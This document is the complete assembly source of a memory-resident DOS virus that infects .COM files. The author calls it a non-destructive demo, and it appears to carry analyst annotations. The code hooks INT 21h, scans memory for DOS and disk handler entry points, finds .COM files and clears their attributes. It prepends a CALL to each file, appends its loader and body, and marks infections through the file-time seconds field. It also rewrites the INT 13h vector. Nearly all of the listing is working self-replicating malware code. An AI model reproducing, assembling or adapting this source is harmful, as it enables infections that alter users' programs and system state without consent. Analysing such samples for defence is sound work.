
;*****************************************************************************
;           			 VIRUS  DEMO (not destructive)
;-----------------------------------------------------------------------------
; Analyst summary, taken from the instructions in this listing:
;   * Resident DOS file infector for *.COM files (search mask `fname`).
;   * The resident part filters INT 21h requests; on the file-related
;     functions it matches, it runs one infection pass before passing the
;     request on through INT 6Bh.
;   * Infection marker: seconds field of the file time set to 31 (= 62 s).
;   * File change: the first 3 bytes are replaced by a near CALL and
;     plen + len bytes (014Eh + 037Eh = 04CCh = 1228) are appended.
;   * Interrupt slots 6Bh and 6Ch hold INT 21h / INT 13h entry points; a
;     non-zero offset word in slot 6Bh doubles as the "already resident" flag.
; "Not destructive" is the author's label; the code still rewrites files,
; file attributes, file times and interrupt vectors.

len	equ	037eh		; byte count written from offset 0100h (appended body) and copied by the loader
plen	equ	014eh		; byte count written starting at `data` (appended loader prefix)
cplace  equ	9800h		; not referenced by any instruction in this listing, only by comments

;-----------------------------------------------------------------------------
;    				FIND FIRST FILE
;-----------------------------------------------------------------------------
jmp	con
; NOTE(review): `hooked` installs offset 0102h as the INT 21h entry point.
; That is the instruction below only if the jmp above assembles to 2 bytes
; at offset 0100h - no ORG is visible in this listing, confirm on the build.

; Resident INT 21h filter: AH holds the DOS function number of the request.
; Any function listed here diverts to `con` (one infection pass, then the
; request is forwarded); everything else is forwarded immediately.

cmp	ah,3dh ;open file (handle)
je	con
cmp	ah,0fh ;open file (FCB)
je 	con
cmp     ah,4bh ;exec!!!
je	con
cmp 	ah,0eh ;select disk
je	con
cmp 	ah,5bh ;create new file (handle)
je	con
cmp	ah,16h ;create file (FCB)
je	con
cmp	ah,3ch ;create file (handle)
je	con
cmp	ah,41h ;delete file (handle)
je 	con
cmp	ah,13h ;delete file (FCB)
je	con
cmp	ah,56h ;rename file (handle)
je	con
cmp	ah,17h ;rename file (FCB)
je	con


; end of check


int	6bh	; forward the request to the entry point stored in slot 6Bh
iret


; Start of the infection pass. The caller's registers are saved here and
; restored in reverse order just before the request is forwarded (see the
; pops that follow the second vector swap).
con:	push	ax
push	bx
push	cx
push 	es
push	ds
push	dx

;----------------------------------------------------------------------------
; cancel this line:  put int 6b to int 21 & int 21 to 6b
;		put int 6c to int 13 & int 13 to 6c
;----------------------------------------------------------------------------

; swap int 13 with int 6c
; Both 4-byte vectors are exchanged through the stack: afterwards INT 13h
; points at whatever was stored in slot 6Ch and slot 6Ch holds the previous
; INT 13h vector. Presumably this routes disk access during the pass through
; the address the loader stored in slot 6Ch (see ft13) - TODO confirm.

mov ax,0
mov ds,ax	; DS = 0000h, the interrupt vector table
push word ptr [01b0h] ; int 6c
push word ptr [01b2h]
push word ptr [004ch] ; int 13
push word ptr [004eh]
pop word ptr [01b2h] ; put int 13 to 6c
pop word ptr [01b0h]
pop word ptr [004eh] ; put int 6c to int 13
pop word ptr [004ch]

;-----------------------------------------------------------------------------
;			find first file
;-----------------------------------------------------------------------------

; Point the DOS disk transfer area (DTA) at cs:buff so the directory search
; results land in `buff`. All DOS calls in this pass go through INT 6Bh.
mov	ah,1ah		; AH=1Ah: set DTA to DS:DX
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
int	6bh

mov	ah,4eh		; AH=4Eh: find first match for DS:DX = "*.COM"
mov	cx,0		; attribute mask 0
mov	dx,cs
mov	ds,dx
mov	dx,offset fname
int	6bh
jc	error1		; no match / error: leave the pass



;----------------------------------------------------------------------------
;		CHECK THE TIME OF FILE TO SEE IF IT IS  31*2 SEC
;----------------------------------------------------------------------------
; buff+16h is the file-time word of the search result. Its low 5 bits are
; the seconds field in 2-second units; the value 31 (62 s) is used as the
; "already infected" marker.

lfnd: mov ax,word ptr buff+16h
and ax,31
cmp ax,31
jne maketim	;if time not 31 make time 31 and continue
 
; marker present: skip this file and find the next .com file

mov ah,4fh	; AH=4Fh: find next
int 6bh
jc error1	; no more matches: leave the pass
jmp lfnd


;
; Prepare the marked time value: keep hours/minutes, force seconds field = 31.
; Only the copy in `buff` changes here; it is applied to the file later with
; AH=57h/AL=01h.
maketim:	mov ax,word ptr buff+16h
and ax,65504	;clear the low 5 bits (65504 = 0FFE0h)
add ax,31
mov word ptr buff+16h,ax	; store the marked time back into the search record


; ----------------------------------------------------------------------
;	change the file attributes to 0 (against read only flag)
;----------------------------------------------------------------------

mov ax,cs
mov ds,ax
mov ax,4301h		; AX=4301h: set file attributes to CX
mov cx,0
mov dx,offset buff
add dx,30		; buff+30 (1Eh) = file name field of the search record
int 6bh
; changed attributes to 0 (the result of the call is not checked)




; find file size

;mov ax,word ptr buff+1ah



; open the file

mov	ah,3dh		; AH=3Dh: open existing file
mov	al,2		; access mode 2 = read/write
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,30		; same file name as above
int	6bh
jc	error1
mov	fhandle,ax	; keep the handle for the read/write/close calls below





;------------------------------------
;	close
;-----------------------------------

jmp	cont

;-----------------------------------------------------------------------------
;		NOT	FAR	ERROR (here mcafee searches for the string)
;-----------------------------------------------------------------------------
; Relay label: the conditional jumps around here target error1, which then
; jumps on to `error` (close file, restore vectors, forward the request).

error1: jmp error

;-----------------------------------------------------------------------------
;                PUT THE CALL INSTRUCTION CODE IN BUFF
;-----------------------------------------------------------------------------
; Builds 3 bytes at buff+0..2: opcode E8h (near CALL) followed by a 16-bit
; displacement of (file size - 3). Written at file offset 0, that CALL lands
; on the first byte appended after the original end of the file.
; Only the low word of the size field (buff+1Ah) is used.


cont:	mov ax,word ptr buff+1ah    ; ax=the file size
sub ax,3	;displacement is relative to the end of the 3-byte instruction
mov	buff+1,al
mov	buff+2,ah
mov	ax,00e8h
mov	buff,al		; E8h = near CALL opcode

;-----------------------------------------------------------------------------
;		READ THE 3 FIRST BYTES FROM THE FILE
;-----------------------------------------------------------------------------

mov	ah,42h		; AH=42h: move file pointer
mov	al,0		; origin 0 = start of file, offset CX:DX = 0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error1


mov	ah,3fh		; AH=3Fh: read CX bytes to DS:DX
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
add	dx,3		; destination buff+3..5, right after the CALL built above
mov	bx,fhandle
mov	cx,3
int	6bh
jc	error1
cmp	ax,cx		; AX = bytes actually read
jl	error1		; fewer than 3 bytes: give up on this file


;-----------------------------------------------------------------------------
;			MOVE 3 BYTES FROM BUFF+3 TO dat1-3
;-----------------------------------------------------------------------------
; dat1/dat2/dat3 are the immediate bytes of the three instructions at `data`,
; so the host's original first 3 bytes travel inside the appended prefix.

mov	al,buff+3
mov	dat1,al
mov	al,buff+4
mov	dat2,al
mov	al,buff+5
mov	dat3,al

;-----------------------------------------------------------------------------
; 		WRITE THE JMP INSTRUCTION TO THE DISK
;-----------------------------------------------------------------------------
; (The bytes written are the E8h CALL built at buff+0..2.)


mov	ah,42h		; seek back to the start of the file
mov	al,0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error1


mov	ah,40h		; AH=40h: write CX bytes from DS:DX
mov	dx,cs
mov	ds,dx
mov	dx,offset buff
mov	bx,fhandle
mov	cx,3
int	6bh
jc	error1
cmp	ax,3		; AX = bytes actually written
jne	error


;-----------------------------------------------------------------------------
;	CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
;-----------------------------------------------------------------------------

; sdat1 is the 16-bit immediate of the `mov si,imm16` encoded at `source`.
; The value stored is (file size + 100h + plen): the offset, inside the
; infected program once loaded, of the bytes appended after the prefix.
mov ax,word ptr buff+1ah
add	ax,100h
add	ax,plen
mov	sdat1,al
mov	sdat1+1,ah

;-----------------------------------------------------------------------------
;			WRITE THE VIRUS PREFIX TO DISK
;-----------------------------------------------------------------------------

mov	ah,42h		; AH=42h: move file pointer
mov	al,2		; origin 2 = end of file, offset 0
mov	bx,fhandle
mov	cx,0
mov	dx,0
int	6bh
jc	error

mov	ah,40h		; append plen bytes starting at `data` (patched prefix)
mov	dx,cs
mov	ds,dx
mov	dx,offset data
mov	bx,fhandle
mov	cx,plen
int	6bh
jc	error
cmp	ax,plen		; short write: abandon
jne	error


;----------------------------------------------------------------------------
; Append the body: len bytes taken from CS:0100h of the running copy.
; Together with the prefix the file grows by plen + len = 04CCh (1228) bytes.
;----------------------------------------------------------------------------

mov	ah,40h
mov	dx,cs
mov	ds,dx
mov	dx,0100h
mov	bx,fhandle
mov	cx,len
int	6bh
jc	error
cmp	ax,len		; short write: abandon
jne	error


;-----------------------------------------------------------------------------
;			set old date again + fixed time
;-----------------------------------------------------------------------------

; Write the file's date/time back: the date is the one returned by the
; search, the time is the copy whose seconds field was forced to 31 in
; maketim. The directory entry therefore shows the original date and a time
; ending in 62 seconds.
mov ah,57h
mov al,01h	; AH=57h/AL=01h: set file date and time by handle
mov bx,fhandle
mov cx,word ptr buff+16h	; time (marked)
mov dx,word ptr buff+18h	; date (unchanged)
int 6bh


;----------------------------------------------------------------------------
;		put the old attributes back
;----------------------------------------------------------------------------

mov ax,cs
mov ds,ax
mov ax,4301h			; AX=4301h: set file attributes to CX
mov cl,byte ptr buff+15h	; attribute byte saved in the search record
mov ch,0
mov dx,offset buff
add dx,30			; file name field of the search record
int 6bh






;-----------------------------------------------------------------------------
;			CLOSE FILE
;-----------------------------------------------------------------------------

; Common exit of the infection pass. It is reached by falling through after
; a completed pass and by jumping here from every failure branch, including
; branches taken before `fhandle` was assigned during this pass.
error:	mov	ah,3eh	; AH=3Eh: close the handle in BX
mov	bx,fhandle
int	6bh

;-----------------------------------------------------------------------------

; swap back int 13 with int 6c
; Same exchange as at `con`; running it a second time puts both vectors back
; where they were before the pass.

mov ax,0
mov ds,ax
push word ptr [01b0h] ; int 6c
push word ptr [01b2h]
push word ptr [004ch] ; int 13
push word ptr [004eh]
pop word ptr [01b2h] ; put int 13 to 6c
pop word ptr [01b0h]
pop word ptr [004eh] ; put int 6c to int 13
pop word ptr [004ch]




;-----------------------------------------------------------------------------
; Restore the registers saved at `con` (reverse order of the pushes).

pop	dx
pop	ds
pop	es
pop	cx
pop	bx
pop	ax

int	6bh	; now carry out the caller's original request via slot 6Bh

iret




;*****************************************************************************
;  				DATA SECTION
;-----------------------------------------------------------------------------

; buff: 43-byte area used as the DOS disk transfer area for the directory
; search. Offsets read by the code: +15h attribute, +16h time, +18h date,
; +1Ah size (low word), +1Eh file name. Bytes +0..+5 are reused as scratch
; for the 3-byte CALL and the host's original first 3 bytes.
buff	db	43 dup (0)
fname	db	"*.COM",0	; search mask, no path component

fhandle dw	?		; DOS handle of the file being modified


; Start of the plen-byte prefix that is appended to each infected file
; (written from `data` in the infection pass). The three 5-byte groups
; encode `mov byte ptr [0100h],dat1`, `[0101h],dat2` and `[0102h],dat3`
; (198,6 = C6h 06h): executed in the infected program, they put the host's
; original first 3 bytes back in memory. dat1..dat3 are patched per file.
data	db	198,6,0,1
dat1	db	0
datb	db	198,6,1,1
dat2	db	0
datc	db	198,6,2,1
dat3	db	0


; Loader, executed inside an infected program right after the three
; restore instructions at `data`. It was entered through the CALL placed at
; the start of the file, so the top of the stack is that CALL's return address.
pop	bx	;discard the CALL's return address
mov	bx,100h
push	bx	;the final `ret` will continue at 0100h, the host's start

; push all registers

push	ax
push	dx
push	ds

;-----------------------------------------------------------------------------
;			check if virus is already in MEMORY
;	if it is, use the one in memory
;-----------------------------------------------------------------------------
; Residency test: the offset word of interrupt slot 6Bh (0000:01ACh).
; Non-zero is treated as "already installed" and skips straight to ggo.

	mov ax,0
	mov ds,ax
	mov ax,[01ach]
	cmp ax,0
	jne ggo00



; find cplace and push it
; Destination segment = (word at 0000:0413h) * 40h - 867h. 0000:0413h is
; the BIOS conventional-memory size in KB, so KB*40h is the segment just
; past the end of conventional memory. No instruction in this listing
; changes the value at 0413h or allocates the region through DOS.
mov ax,0
mov ds,ax
mov ax,[413h]
mov bx,40h
mul bx
sub ax,867h
mov cx,ax
push cx		; popped into ES below

;
; Copy len bytes from DS:SI to ES:0100h. `source` + `sdat1` are the bytes of
; a `mov si,imm16` (190 = BEh) whose immediate was patched at infection time.

mov 	cx,len
source	db	190	;MOV SI,OFFSET SOURCE
sdat1	db	0,0
mov 	di,100h
push	cs
pop	ds
pop	es ;destination segment computed above (author's note: cplace-> now 9800h)
cld
rep movsb


;------------------------------------------------------------------------------
;		put int 21 => int 6b & int 13 => int 6c
;------------------------------------------------------------------------------


	; Goal of this section: fill interrupt slot 6Bh with an INT 21h entry
	; point. A segment value is read from the vector table, that segment is
	; scanned for one of two 5-byte code patterns, and the match address is
	; stored in slot 6Bh. If nothing matches, the current INT 21h vector is
	; copied instead. Requests issued later through INT 6Bh therefore do not
	; necessarily pass through handlers chained on INT 21h by other
	; resident software - presumably the purpose of the scan.
	mov ax,3000h
	int 21h ; AH=30h get DOS version: AL = major, AH = minor
d20:	mov si,00bah	; 0000:00BAh = segment word of the INT 2Eh vector
	cmp al,2h
	je didit
	cmp ax,0003h	; AX <= 0003h: major <= 3 with minor 0
	jbe didit

d30:	mov si,00b6h	; otherwise 0000:00B6h = segment word of the INT 2Dh vector
didit:	mov ax,0
	mov ds,ax
	mov ax,[si]
	mov ds,ax	; DS = segment to scan
	mov si,0000h
	; Pattern A: bytes 2Eh 3Ah 26h at SI..SI+2 and 0Dh at SI+4.
fnd: 	mov al,2eh
	mov ah,80h	; first byte of pattern B, tested at do33
	cmp al,[si]
	jne	do33

	mov al,3ah
        cmp al,[si+1]
        jne do33

	mov al,26h
	cmp al,[si+2]
	jne do33

	mov al,0dh
	cmp al,[si+4]
	je  found
        jmp do33
;-----------------------------------------
;    bridge for far jump
; (relay used by the residency test earlier in the loader)

ggo00: jmp ggo


;----------------------------------------
	; Pattern B: bytes 80h 0FCh 4Bh at SI..SI+2 and 05h at SI+4.
do33:	cmp ah,[si]
	jne	nohing

	mov ah,0fch
	cmp ah,[si+1]
	jne nohing

	mov ah,4bh
	cmp ah,[si+2]
	jne nohing

	mov ah,5h
	cmp ah,[si+4]
	je found
nohing: inc si
	cmp si,0fffch	; scan offsets 0000h..0FFFBh of the segment
	jne fnd

; hook to int 21 (there is no another choice)
; Fallback when neither pattern was found: slot 6Bh := current INT 21h vector.

mov dx,0
mov ds,dx
push word ptr [84h] 
pop word ptr [1ach] ; offset of int 21 -> offset of int 6b
push word ptr [86h]
pop word ptr [1aeh] ; segment of int 21 -> segment of int 6b

jmp ft13

; end of hook
; Match found: slot 6Bh := DS:SI (address of the matched pattern).
found:  push ds
	mov ax,0
	mov ds,ax
	pop [01aeh] ; segment of int 6b
	push si
	pop [01ach] ; offset of int 6b
	
;-----------------------------------------------------------------------------








;----------------------------------------------------------------------------
;			find int 13h
;

; Fills interrupt slot 6Ch with an INT 13h entry point, in the same way the
; previous section filled slot 6Bh. Note that the INT 13h vector itself is
; first overwritten with the fixed address C800:215Dh, whatever code the
; machine has at that address; that fixed value in 0000:004Ch..004Fh is
; observable afterwards.
ft13:	mov si,0
	mov ds,si

	mov ax,3000h
	int 21h		; AH=30h get DOS version: AL = major

	mov cx,0c800h
	mov bx,215dh
	mov [004ch],bx	; INT 13h offset  := 215Dh
	mov [004eh],cx	; INT 13h segment := C800h
	cmp al,2
	je hooked	; DOS major version 2: no scan, slot 6Ch is left as it was

	mov ax,[003eh]	; 0000:003Eh = segment word of the INT 0Fh vector
	mov ds,ax	; DS = segment to scan
	mov ax,0a32eh	; AL=2Eh, AH=0A3h
	mov bx,809ch	; BL=9Ch, BH=80h
	mov cl,2eh

	; Pattern: 2Eh 0A3h at SI..SI+1, 9Ch at SI+4, and 80h or 2Eh at SI+5.
fnd13:  cmp [si],al
	jne loko
	cmp ah,[si+1]
	jne loko
	cmp bl,[si+4]
	jne loko
	cmp bh,[si+5]
	je  put13
	cmp cl,[si+5]
	je put13

loko:	inc si
	cmp si,0fffch	; scan offsets 0000h..0FFFBh of the segment
	jne fnd13

;put int 13 to int 6c
; Fallback when no match was found: slot 6Ch := current INT 13h vector,
; which at this point is the C800:215Dh value written above.

mov dx,0
mov ds,dx
push word ptr [004ch]
pop word ptr [01b0h]
push word ptr [004eh]
pop word ptr [01b2h]

jmp hooked

;end of hook

; Match found: slot 6Ch := DS:SI (address of the matched pattern).
put13:  push ds
	mov ax,0
	mov ds,ax
	pop [01b2h]
	mov [01b0h],si

;------------------------------------------------------------------------
;		HOOK THE VIRUS TO INT 21
;------------------------------------------------------------------------


; hook the virus
; hook the virus
; INT 21h vector := ES:0102h. ES is the segment the body was copied to by
; the rep movsb earlier in the loader, and 0102h is the offset this listing
; uses for the resident filter. DS is 0000h on every path that reaches here.
hooked: mov	ax,102h
mov	[84h],ax
mov	[86h],es ;segment of the resident copy (author's note: put cplace)

;-----------------------------------------------------------------------
; Issue one INT 21h request with AH=0Fh. That function number is on the
; resident filter's list, so this presumably runs an infection pass
; immediately - TODO confirm. This is also where the loader
; lands when the residency test found slot 6Bh already in use.
;-----------------------------------------------------------------------
ggo:	 mov	ah,0fh
int	21h

; pop all registers
pop ds
pop dx
pop ax

ret	; pops the 0100h pushed at loader entry: control passes to the host program
